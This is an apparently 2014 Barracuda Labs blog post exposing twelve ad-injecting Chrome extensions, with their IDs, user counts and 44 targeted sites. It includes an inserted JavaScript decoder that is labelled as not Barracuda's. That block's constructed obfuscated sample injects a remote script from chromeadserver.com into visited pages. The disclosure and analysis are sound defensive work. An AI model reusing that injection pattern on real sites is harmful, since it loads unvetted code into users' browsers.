More Spam Chrome Extensions Impacting 180K Users That Google Should Remove

Feb 03, 14

The Google Chrome web store has been in the spotlight recently for security risks that some of the tools are causing. Most recently, Google had to remove two Chrome extensions that could sneakily inject ads or malware on websites that would then infect unsuspecting users. There were more than 100,000 users who may have been infected before Google removed the two extensions.

At Barracuda Labs, we have monitored Chrome extension spam since Oct 2012, when we found several spamming extensions using Rovio’s famous puzzle games as the hook to attract 82,000 users in a few days. In the last few weeks, we have made some new and interesting findings about another big spam campaign back in the Chrome web store.

In summary, we found 12 Chrome extensions that inject advertisements into 44 popular websites and that have been installed by more than 180,000 Chrome users; see Table 1.

Table 1: The List of Ads-injecting Chrome Extensions Still Live as of Jan-30-2014

| Title | URL (extension ID) | Permissions Required | #Users 01-08 | #Users 01-15 | #Users 01-23 | #Users 01-30 |
|---|---|---|---|---|---|---|
| logo quiz game | kmkacofigdhiobalbhnklkknlbplmjpj | Your data on all websites | 75257 | 77744 | 81158 | 81994 |
| counter strike cs portable | dkbaopnghjggmdcmcoaloenaalokmili | Your data on all websites | 25680 | 26538 | 27549 | 26999 |
| snail bob 2 | jdjpjalodncbfhaghlafopfckkchenoi | Your data on all websites, Your tabs and browsing activity | 14983 | 15015 | 15840 | 15851 |
| pac-man 80s | njgeoadngonelhmacgjigochdijoofgn | Your data on all websites, Your tabs and browsing activity | 12161 | 12652 | 13389 | 13415 |
| draw my thing | hdijmiefiogighmeaonofemaclnfplil | Your data on all websites | 11117 | 11354 | 11961 | 12198 |
| nyan cat fly | bphkilcpnjgeegfnmifeifcmkgjngknk | Your data on all websites, Your tabs and browsing activity | 9044 | 9305 | 9857 | 9794 |
| tetris flash | cfhhalmjbofkjcgefcaejjdicdddpkkk | Your data on all websites, Your tabs and browsing activity | 8284 | 8558 | 8798 | 8945 |
| bubble elements | fcijkonhppildbjgkdaglmeoeemcldha | Your data on all websites, Your tabs and browsing activity | 5126 | 5174 | 5413 | 5384 |
| angry halloween hd | emfeoamofdcdeeaicodpfofpfefibaee | Your data on all websites | 2100 | 2127 | 2229 | 2268 |
| smart soccer goalkeeper | dfcjfcgpnnnkcppamjpobglgefaoecia | Your data on all websites | 1904 | 1994 | 2089 | 2080 |
| pac-xon deluxe | gghdghpgjbaddlnfaopaildhlahpegmp | Your data on all websites, Your tabs and browsing activity | 1788 | 1896 | 1968 | 2024 |
| pong | pdiilpimpenppmfcgjhnjkoebelagipj | Your data on all websites, Your tabs and browsing activity | 360 | 404 | 393 | 410 |
| Total | | | 167,804 | 172,761 | 180,644 | 181,362 |

As last time, all of these extensions require the permission “Your data on all websites”, so that the ads can be injected into any website the user browses.

Meanwhile, all of these extensions are registered under the same developer organization: www.konplayer.com.


Figure 1: One of the ads-injecting extensions from www.konplayer.com, with 81,158 users

Unlike our last findings, the extension codebase does not itself contain the malicious JavaScript. Instead, the code merely references a URL and the JavaScript is hosted on another domain, www.chromeadserver.com, a name that could trick unsuspecting users into thinking Google owns the domain, which it does not.


Figure 2: JavaScript code of the ads-injecting Chrome extension

After downloading the JavaScript from the above URL, we noticed that the file begins with the jQuery library code (a JavaScript library widely used in website design), which looks very benign. Later in the file, however, obfuscated JavaScript begins, which is very suspicious.


Figure 3: Obfuscated JavaScript code adschrome.js served at chromeadserver.com

After decoding the hexadecimal ASCII escapes and piecing the whole script together, we recovered the following code. It took some time to understand, but it looked familiar.


Figure 4: Decoded JavaScript code of adschrome.js

A careful reading of this decoded program shows that it is what injects ad banners at various positions on 44 popular websites. The list of these 44 websites follows:
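The decoding step described above, as an added example that is not Barracuda's or the extension's code: it turns the "\xNN" hex escapes back into text and then lists the hostnames and remote-script loading the decoded script contains, which is what an analyst or store reviewer needs before judging the code. The obfuscated sample inside is constructed for this example in the style of Figure 3; it is not the real adschrome.js.

```javascript
// Added example, not Barracuda's or the extension's code: decode "\xNN"-escaped
// JavaScript and report the hostnames and remote-script loading it references.

// Constructed sample in the style of Figure 3 (not the real adschrome.js):
// a hex-escaped hostname table, a <script> element pointed at a remote file,
// and a check of the visited site's hostname.
const OBFUSCATED_SAMPLE = String.raw`var _0xa=["\x77\x77\x77\x2e\x63\x68\x72\x6f\x6d\x65\x61\x64\x73\x65\x72\x76\x65\x72\x2e\x63\x6f\x6d",
"\x79\x6f\x75\x74\x75\x62\x65\x2e\x63\x6f\x6d","\x6d\x73\x6e\x2e\x63\x6f\x6d"];
var s=document.createElement("script");
s.src="http://"+_0xa[0]+"/\x61\x64\x73\x63\x68\x72\x6f\x6d\x65\x2e\x6a\x73";
if(location.hostname==_0xa[1]||location.hostname==_0xa[2]){document.body.appendChild(s);}`;

// Turn "\xNN" and "\uNNNN" escape sequences back into the characters they hide.
function decodeHexEscapes(src) {
  return src.replace(/\\x([0-9a-f]{2})|\\u([0-9a-f]{4})/gi,
    (_m, h2, h4) => String.fromCharCode(parseInt(h2 || h4, 16)));
}

// Collect hostnames that appear either as a whole quoted string ("msn.com")
// or as the host part of an http(s) URL; returned sorted and de-duplicated.
function extractHostnames(decoded) {
  const re = /"((?:[a-z0-9-]+\.)+[a-z]{2,})"|https?:\/\/((?:[a-z0-9-]+\.)+[a-z]{2,})/gi;
  const found = new Set();
  let m;
  while ((m = re.exec(decoded)) !== null) found.add((m[1] || m[2]).toLowerCase());
  return [...found].sort();
}

// True when the script builds a <script> element and assigns its src,
// the remote-code loading pattern this post describes.
function loadsRemoteScript(decoded) {
  return /createElement\(\s*["']script["']\s*\)/i.test(decoded) && /\.src\s*=/.test(decoded);
}

// Full report for one script: decoded text, referenced hosts, remote-load flag.
function analyzeScript(src) {
  const decoded = decodeHexEscapes(src);
  return { decoded, hostnames: extractHostnames(decoded), remoteScriptLoad: loadsRemoteScript(decoded) };
}

// Stand-alone run: print the report for the constructed sample.
console.log(JSON.stringify(analyzeScript(OBFUSCATED_SAMPLE), null, 2));
```

Hostnames that appear in the decoded output but nowhere in the extension's own manifest or listing are the ones worth checking against the remote-hosting pattern described above.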

Table 2: The List of Websites that will be injected with Ads by the Above Chrome Extensions

| Website | Website |
|---|---|
| chrome.angrybirds.com | www.myhappygames.com |
| heikki.angrybirds.com | www.chromegamez.com |
| poppit.pogo.com | www.gamesvarious.com |
| chrome.monsterdashgame.com | msn.com |
| www.officewebgames.com | yahoo.com |
| game2player.com | youtube.com |
| www.flashgames101.com | www.negane.com |
| games4chrome.com | imdb.com |
| www.tarmogames.com | myspace.com |
| www.gamesgator.com | chrome.plantsvszombies.com |
| www.douchegames.com | bejeweled.popcap.com |
| higamecenter.com | evolvedonlinegames.com |
| chromegamebox.com | www.webstoregames.com |
| kizi.com | www.wardoom.com |
| home.sweetim.com | www.sasquatchsurvivor.com |
| www.juegos.com | www.realmofthemadgod.com |
| www.miniclip.com | gameboysite.com |
| naclgames.com | www.pinkemu.com |
| armorgames.com | www.silverstoregames.com |
| chrometopgames.com | disney.go.com |
| chrome.kingstonking.com | 2048gamers.com |
| captainwebstore.com | entanglement.gopherwoodstudios.com |

We also notice that this code was used in the ads-injecting Chrome extensions disclosed in our last report. This is probably the same group of hackers, now operating under the name www.konplayer.com instead of www.playook.info.

Google can surely remove these spam extensions from the web store for now to protect future victims, but what if the group changes its name again, or relocates and tweaks the spam code? Until Google provides a sustainable solution, Chrome users have to learn to protect themselves. As we have always advised, Chrome users should be very careful when installing Chrome extensions, even ones from the Google Chrome web store. Use common sense to judge whether an extension needs the permissions it requests. If any of the permissions seem to go beyond what the extension should need to do its job, do not install it.

Once again, Google failed to protect Chrome users by allowing these spam extensions on its shelves, which is certainly something users should consider when deciding which products to use.